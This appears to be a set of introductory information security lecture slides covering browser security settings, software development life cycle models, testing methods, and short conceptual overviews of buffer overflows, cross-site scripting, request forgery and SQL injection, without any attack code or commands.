Information

Security 1
 TOPIC DISCUSSION

8 Application Security
8.1 Web Browser Security
8.2 Web Browser Concerns
8.3 Web Browser Configuration
8.4 Securing Applications
 TOPIC DISCUSSION

9 Secure Software Development

9.1 SDLC Principles
9.2 Testing Methods
9.3 Software Vulnerabilities and Exploits

9.4 Buffer Overflows

9.5 XSS and XSRF
9.6 SQL Injection
 Web Browser Security

Today, web browsers are installed on almost all computers.

Because web browsers are used so frequently, it is vital to
configure them securely. Often, the web browser that comes with
an operating system is not set up in a secure default configuration.
Not securing your web browser can lead quickly to a variety of
computer problems caused by anything from spyware being
installed without your knowledge to intruders taking control of
your computer.
 Web Browser Concerns

Attackers focus on exploiting client-side systems (your

computer) through various vulnerabilities. They use these
vulnerabilities to take control of your computer, steal your
information, destroy your files, and use your computer to attack
other computers. A low-cost method attackers use is to exploit
vulnerabilities in web browsers. An attacker can create a
malicious web page that will install Trojan software or spyware
that will steal your information.
 Web Browser Configuration

One of the easiest “technologies” to keep your information and

computer safe is properly configuring the security settings on
your web browser. Most people leave the settings at default
because it’s convenient, but not taking those extra couple of
minutes now can mean many costly hours (or weeks) later if
your information gets compromised.
 Web Browser Configuration
Some setting suggestions in your browser

Limit cookie storage Cookies are data files a webpage puts on your computer that tracks
information about you.
Don’t store passwords or Some webpages ask if you want to store information such as credit
allow sites to remember
your form entries cards, usernames or passwords.

Disable pop-ups Pop-ups are generally advertisements or other little windows that force
you to pay attention to them before you can get back to the webpage
you are on.
Limit plug-ins and add-ons Downloaded toolbars, plug-ins and add-ons can be helpful for
enhancing your browsing experience, but the more items you attach to
your browser, the more possible vulnerabilities there are for an attacker
to exploit.
 Web Browser Configuration
Some setting suggestions in your browser

Enable automatic site Automatic Site Checking or other filters such as this will check
checking webpages you visit against known fraudulent or malicious websites (a
blacklist) and warns or blocks you before loading the page.

Prompt for downloads

The Automatic Site checking mentioned above can help review
downloads for malware, but there are other settings you can configure
that can help alert when something is about to download in case you
accidently click a link and realize you shouldn’t be downloading that
item.
Clear browsing data This removes all stored web data on your computer (cookies, cache,
history, stored passwords/autofill data, etc.).
Securing Applications

Application security is an important concept

you need to know to give users the
appropriate permissions within an
application.
 SDLC Principles

The Software Development Life Cycle can be approached in

many ways, and over time a number of formal models have been
created to help provide a common framework for development.
While formal SDLC models can be very detailed, with specific
practices, procedures, and documentation, many organizations
choose the elements of one or more models that best fit their
organizational style, workflow, and requirements.
 SDLC Principles
Waterfall Methodology

The Waterfall methodology is a

sequential model in which each
phase is followed by the next
phase. Phases do not overlap,
and each logically leads to the
next.
 SDLC Principles
Spiral Methodology
The Spiral model uses the linear
development concepts from the
Waterfall model and adds an iterative
process that revisits four phases
multiple times during the
development life cycle to gather
more detailed requirements, design
functionality guided by the
requirements, and build based on the
 SDLC Principles
Agile Methodology

Agile software development is an

iterative and incremental process,
rather than the linear processes that
Waterfall and Spiral use. Agile is
rooted in the Manifesto for Agile
Software Development, a document
that has four basic premises
 SDLC Principles
Agile 4 Basic Premises

01 Individuals and interactions are more important than processes and tools.

02 Working software is preferable to comprehensive documentation.

03 Customer collaboration replaces contract negotiation.

04 Responding to change is key, rather than following a plan.

 SDLC Principles
Agile Methodology
 SDLC Principles
Agile development uses a number of specialized terms:

> Backlogs

> Planning poker

> Timeboxing

> User stories

> Velocity tracking

 SDLC Principles
Rapid Application Development

The RAD (Rapid Application

Development) model is an iterative
process that relies on building
prototypes. Unlike many other
methods, there is no planning phase;
instead, planning is done as the
software is written.
 SDLC Principles
V model

is an extension of the Waterfall model that pairs a testing phase

with each development stage. Each phase starts only after the
testing for the previous phase is done. Thus, at the requirements
phase the requirements are reviewed (or tested), and at design
phase, a test phase for the system design is completed before
starting coding.
 SDLC Principles
Big Bang SDLC model

The Big Bang SDLC model relies on no planning or process.

Instead, it focuses on making resources available and simply
starting coding based on requirements as they are revealed.
Obviously the Big Bang model doesn’t scale, but it is a common
model for individual developers working on their own code.
 Testing Methods

Test cases are developed using various test techniques to

achieve more effective testing. By this, software completeness is
provided and conditions of testing which get the greatest
probability of finding errors are chosen. So, testers do not guess
which test cases to chose, and test techniques enable them to
design testing conditions in a systematic way.
 Testing Methods
White box testing

White box testing is highly effective in detecting and resolving

problems, because bugs (bug or fault is a manifestation of an
error in a software,) can often be found before they cause
trouble. We can shortly define this method as testing software
with the knowledge of the internal structure and coding inside
the program.
 Testing Methods
Black box testing

Black box testing is testing software based on output

requirements and without any knowledge of the internal
structure or coding in the program In another words, a black box
is any device whose workings are not understood by or
accessible to its user.
 Software Vulnerabilities and Exploits

A software vulnerability is a glitch, flaw, or weakness present in

the software or in an OS (Operating System). The severity of
software vulnerabilities advances at an exponential rate. Some
of software vulnerability are SQL Injection, OS Command
Injection, Buffer Overflow, Uncontrolled Format String, and
Integer Overflow.
 Buffer Overflows

Buffer overflows occur when an application receives more data

than it’s programmed to accept. This situation can cause an
application to terminate or to write data beyond the end of the
allocated space. Termination may leave the system sending the
data with temporary access to privileged levels in the attacked
system, while overwriting can cause important data to be lost.
This exploitation is usually a result of a programming error in
the development of the software.
 XSS and XSRF

Cross-site scripting (XSS) allows an attacker to redirect users to

malicious websites and steal cookies. E-mail can include an
embedded HTML image object or a JavaScript image tag as part
of a malicious cross-site scripting attack. Cross-site request
forgery (XSRF) is an attack where an attacker tricks a user into
performing an action on a website. The attacker creates a
specially crafted HTML link and the user performs the action
without realizing it.
 SQL Injection

In a SQL injection attack, the attacker enters additional data into

the web page form to generate different SQL statements. SQL
query languages use a semi colon (;) to indicate the end of the
SQL line and use two dashes (–) as an ignored comment.